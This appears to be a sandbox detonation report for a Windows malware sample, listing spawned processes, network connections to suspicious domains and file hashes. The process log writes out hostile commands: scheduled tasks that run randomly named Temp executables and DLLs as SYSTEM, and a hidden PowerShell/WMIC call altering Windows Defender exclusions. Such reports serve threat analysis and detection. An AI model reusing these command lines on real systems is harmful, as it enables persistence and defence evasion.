C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gtIkoObEa"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 15:14:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe\" Wy /kOKwdidno 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe Wy /kOKwdidno 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2800 -ip 2800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 820
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\dAvQqI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\ULWxyeQ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\oFBZBqb.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\RqGnkYf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\cxgOVhs.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\XoErYOe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 03:02:56 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\KogpVepN\xZQfABZ.dll\",#1 /Mmdidkr 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MRTHivZIQsRdEanwm"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\KogpVepN\xZQfABZ.dll",#1 /Mmdidkr 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\KogpVepN\xZQfABZ.dll",#1 /Mmdidkr 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1892
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qRhoV1" /SC once /ST 06:32:20 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "qRhoV1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1912
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcebd73cb8,0x7ffcebd73cc8,0x7ffcebd73cd8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2024
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2084 /prefetch:2
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qRhoV1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1588 -ip 1588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1104 -ip 1104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 2124
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,9397934741660054371,14854084779435866652,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1184
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.20.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 20.90.153.243:443 | client.wns.windows.com | tcp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| US | 104.26.2.30:443 | trk.imghst-de.com | tcp |
| US | 172.67.73.113:443 | trk.imghst-de.com | tcp |
| US | 172.67.73.113:443 | trk.imghst-de.com | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| GB | 92.123.143.169:80 | apps.identrust.com | tcp |
| GB | 142.250.200.46:443 | google.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 104.21.70.174:443 | senzamenuzaes.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.73.21:443 | z3n.mom | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 198.54.117.242:443 | slatevision.org | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| NL | 82.145.216.16:443 | features.opera-api2.com | tcp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 44.237.52.63:80 | api4.tracemonitors.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 44.237.52.63:443 | api4.tracemonitors.com | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| US | 104.21.20.211:443 | oasqi.nxt-psh.com | tcp |
| RU | 80.78.240.92:80 | rfiles3.tracemonitors.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| GB | 20.90.153.243:443 | client.wns.windows.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 44.240.96.128:443 | api4.tracemonitors.com | tcp |
| US | 44.240.96.128:443 | api4.tracemonitors.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8b0c53c5fe6ad2ee4ffbde1b3384d027 |
| SHA1 | 0c9ae4f75a65ed95159b6eb75c3c7b48971f3e71 |
| SHA256 | 2e9fc3b050296902d0bb0ce6b8acc0bb54440f75f54f1f04ae95c9956108171f |
| SHA512 | 29f62e085d685d3b4902515790ab4f298454d0f8d53b6234fae9f9a0edffdd0d4edee57261e8eb0b94a4af8e86d3f7ab8b044c6f259576b89f91183002e58b42 |
\??\pipe\LOCAL\crashpad_5116_MCFATMWUYCYYCVIM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | afe63f44aa3aa9393e4251b4b74226e3 |
| SHA1 | 29eef15e4d60afed127861deebc7196e97d19e4a |
| SHA256 | 7787181844d106768f78847869b5e784f07c1b65109d59b46932979bac823cd3 |
| SHA512 | f0f7951b5d55c2cbb71add5ab0c2ed3617a6fdf93f2c81ee9dd15d9f7c67881b42cbfd97cc4d2f17ba8a383624b23da1897fee069ddcee34233c1f625062a1cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5e1229779e5e46e5ad7f260f6ee6509f |
| SHA1 | 2662f2eda39bd214d0a0346ba53e90692c9cefab |
| SHA256 | 92b9a18a36aa16b57d490764036ebf3ff4268e7580c52e1a9933797342f95188 |
| SHA512 | bde3892ad0dc8f99296ae66f4fd93f19189643ee54aa2c011a47bf70cd0de564e390e9bc5305f88e7adf5813003882cbc2a8bd77093c08e21e6bbffad558b075 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f127f06d500c12fbdc16bebec417b60a |
| SHA1 | 65698192f8dc0733012b4436f9cc1ecde0c4d137 |
| SHA256 | 231a2214f8141332d07bf1a2486c7fc9ca3d640fea4d0d860e039185e0e81f85 |
| SHA512 | 2ce019aa62e8646882e91561b044fb0655980822ef975e4a4fcd6e74da5d70e20b4bd91cdd09d87aa664b6e54565d911533907e1b23c0355c827e19cbab01184 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f043b496be027386032973b34236b8d4 |
| SHA1 | 505450769c078243448473ec87d795667d240c64 |
| SHA256 | 1824e79423b34bc8665667d1e68ae97affd66533d5f28c14dd71aa3efd83f114 |
| SHA512 | e9b713fef295216bbe7a31c61ba94d00593d010c632a4f67c6a8d30e7898acbeb2175b710cad3b02a493855c97e7db38c0470d9b684bf063879cd93b7a57a8c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 846877711fcea90af80b6ebc2936be90 |
| SHA1 | 6fe13d07f62c3f7b7bf8989e399dec12a7120612 |
| SHA256 | 85da2e6f5ad3ba75da9085e7c632a34a2c1206d4df733da3da7a0127feff4ac9 |
| SHA512 | 4bbb9e702113fd4074f13f5c3baf7307c32dd1396806a317bc39979b90a77c888a9791b0abe1b8cffc3880524286296c6c1f453793904cc2ee91d7719b4a5f37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57cd43.TMP
| MD5 | d1e699b661d18eea35cc542004d496c7 |
| SHA1 | f24ba4e263b7383563e0fe5477f4662a883e460d |
| SHA256 | b2d4757755802b6afcca47d4595fd8713d3a75a30d6a7f4f05e84f71ed7cc11f |
| SHA512 | fe834336d7614b19c49d888d3dffeedfc9d70889c043f4fb987779f9a32e3eb16149b9dd80cc399cef5294df8ca3cfcda69177c0b952b17a0d382f3712a6960c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 7c23d842b75a234d662e7a6d061b9d79 |
| SHA1 | 29dd20d9b64a6c2f806321e4b813b06fe1371691 |
| SHA256 | cc974581d29ba504a43b45e1f6a53597f08e3f7ec448f3410fa8a938a4146a07 |
| SHA512 | 3a62132b4f5a610062311b9c417d0eccd3f825ca954e9239096c49541db8723fcab9bb134235aba1b589aca883ad3645601dc50b6208a754cf5b9c29146024d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 09929d18cbc237159174a14d2e113631 |
| SHA1 | 7c203e10373d0ed4e6658b48a154597af015d9fe |
| SHA256 | 1300d9e191218891c2bcf61852ef8c6cad4dcba3bf690b104c415380061580ac |
| SHA512 | 2ec803588f80c7aad12254971b91145b6e0d6d0003b58809f5f1e0f1391bc26c8008a877b901aeb58125d152ad8403f5b5e089aa01c48fa5d27e45a8e90f5c98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9697b4fce0931504d8a10f3d17f82fcd |
| SHA1 | 570a10b2478beb657699edc260d0aec55c49a790 |
| SHA256 | 61202a3dcf04ff286f1d1c22b2b9bfd7dd6ea5c27ac967df46ea2c0cb2adb514 |
| SHA512 | 705ee4ee26389f1db657f82860cbf1e56655db7e483be160234e4689ec81a300173f944cf3c3c700f3caf1898efe672cca162b50511b0791522dc56f9a3e63f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580b36.TMP
| MD5 | cb8f5ea0dbb4f96a78d9e971de8457ea |
| SHA1 | 3590cc6ac1eacd3909c3275ae42e0eb508dea74b |
| SHA256 | d65292b1c6ab470726b1ce9c1b8dd47c84619aba8600e1a9bd6525f2c3224eae |
| SHA512 | 998b767c50b0832441b5e91b876b22e2849b6f12d73970587040706ee54808f4c2bf59faa21e92ace52000eb13f3739bc1f0569653459458a1210b76049b9f0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7185a1bc-67cb-4bfe-9134-bde345a99df8.tmp
| MD5 | 568b1b3176b2ef78c5bf92882d81d239 |
| SHA1 | dd0bb9ad50efb2571450d40d03570c14c6bcf6f5 |
| SHA256 | eaf27de286063afe3ec4172b6619e611a067748c6b24ac5a7715fb32123410c2 |
| SHA512 | c4549f7bca2c3b7c2670bb5976448b5b4c7b21d94d9196a0399e5abbfe08ed561793b7ecbe4998a82480730349e2e9863ac7f6107abedb9981658220b2efe07d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008
| MD5 | 151fb811968eaf8efb840908b89dc9d4 |
| SHA1 | 7ec811009fd9b0e6d92d12d78b002275f2f1bee1 |
| SHA256 | 043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed |
